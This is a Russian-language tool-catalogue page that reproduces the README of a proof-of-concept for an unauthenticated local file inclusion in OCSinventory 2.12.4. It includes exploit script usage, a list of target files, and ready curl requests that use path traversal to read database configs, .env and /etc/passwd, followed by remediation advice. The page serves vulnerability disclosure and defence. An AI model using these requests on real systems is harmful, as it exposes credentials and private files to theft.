Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-16475-PoC — Это официальный репозиторий с PoC для CVE-2026-16475, LFI в OCSinventory 2.12.4. | Kitploit
Инструменты/GitHubGitHub/afertar/cve-2026-16475-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubafertar/cve-2026-16475-poc

CVE-2026-16475-PoC

Это официальный репозиторий с PoC для CVE-2026-16475, LFI в OCSinventory 2.12.4.

Репозиторий
22 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-16475 - OCSinventory LFI PoC

Уязвимость Local File Inclusion в OCSinventory 2.12.4

Детали уязвимости

CVE ID: CVE-2026-16475
Оценка CVSS: 6.9 (Средняя)
CWE: CWE-98 (Некорректный контроль имени файла для инструкции Include/Require в PHP-программе)
Затронутая версия: OCSinventory 2.12.4
Статус: Исправлено в последних версиях

Описание

Уязвимость локального включения файлов (Local File Inclusion, LFI) существует в конечной точке /ajax/teledeployoptions.php из-за некорректной очистки параметра linkedoptions перед его использованием в операции динамического включения XML-файлов.

Конечная точка предназначена для загрузки XML-файлов конфигурации, но не проверяет должным образом параметр linkedoptions, что позволяет проводить атаки с обходом пути (path traversal).

Неаутентифицированный удалённый злоумышленник может использовать эту уязвимость для:

  • Включения и получения доступа к произвольным XML-файлам в каталоге приложения
  • Чтения не-XML-файлов через сообщения об ошибках XML-парсера
  • Раскрытия чувствительной информации о внутренних ресурсах приложения
  • Перечисления системных файлов и определения типа ОС (OS fingerprinting)

Воздействие

  • Конфиденциальность: ВЫСОКАЯ - Доступ к произвольным файлам (конфигурационные файлы, исходный код, журналы, системные файлы)
  • Целостность: НЕТ
  • Доступность: НЕТ
  • Требуется аутентификация: НЕТ
  • Взаимодействие с пользователем: НЕТ

Использование

Предварительные требования

root@kitploit:~
pip install -r requirements.txt

Версия на Python (рекомендуется)

root@kitploit:~
python3 exploit.py -u http://target.com -v

Опции:

  • -u, --url - Целевой URL (обязательно)
  • -v, --verbose - Подробный вывод
  • -o, --output - Сохранить успешно прочитанные данные в файл

Пример:

root@kitploit:~
python3 exploit.py -u http://ocs.example.com -v -o results.txt

Версия на Bash

root@kitploit:~
./lfi_test.sh

Отредактируйте переменную BASE_URL в скрипте:

root@kitploit:~
BASE_URL="http://target.com/ajax/teledeployoptions.php"

Цели перечисления

  • Конфигурационные файлы приложения (dbconfig.inc, .env, config.inc)
  • Рабочие XML-файлы (bashscriptopt, executableopt, msiapplicationopt)
  • Системные журналы (apache2, mysql, auth)
  • Системные файлы (/proc/, /etc/)
  • Секреты приложения (composer, файлы пакетов, .htaccess)

Пример эксплуатации

root@kitploit:~
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"

# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"

# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"

Устранение уязвимости

Для пользователей:

  • Немедленно обновите OCSinventory до последней версии
  • Внедрите правила WAF для блокировки паттернов обхода каталогов

Для разработчиков:

  • Используйте basename() или аналогичные функции для предотвращения обхода пути
  • Проверяйте и очищайте все пользовательские входные данные перед выполнением файловых операций
  • Внедрите надлежащий контроль доступа
  • Используйте списки разрешённых (allow-lists) для допустимых путей к файлам

Ссылки

  • Консультация INCIBE (ES) - Официальный орган по координации CVE
  • OCS Inventory GitHub
  • OWASP Path Traversal
  • Определение CWE-98

Примечание: CVE-2026-16475 координируется через INCIBE и может ещё не быть проиндексирован в NVD. Обращайтесь к источнику INCIBE для получения авторитетной информации.

Правовая информация

Только для образовательных целей и авторизованного тестирования

Полное юридическое уведомление см. в DISCLAIMER.md.

Автор

Adrián Ferrer Tarí


Ответственное раскрытие координируется через INCIBE

Скачать инструмент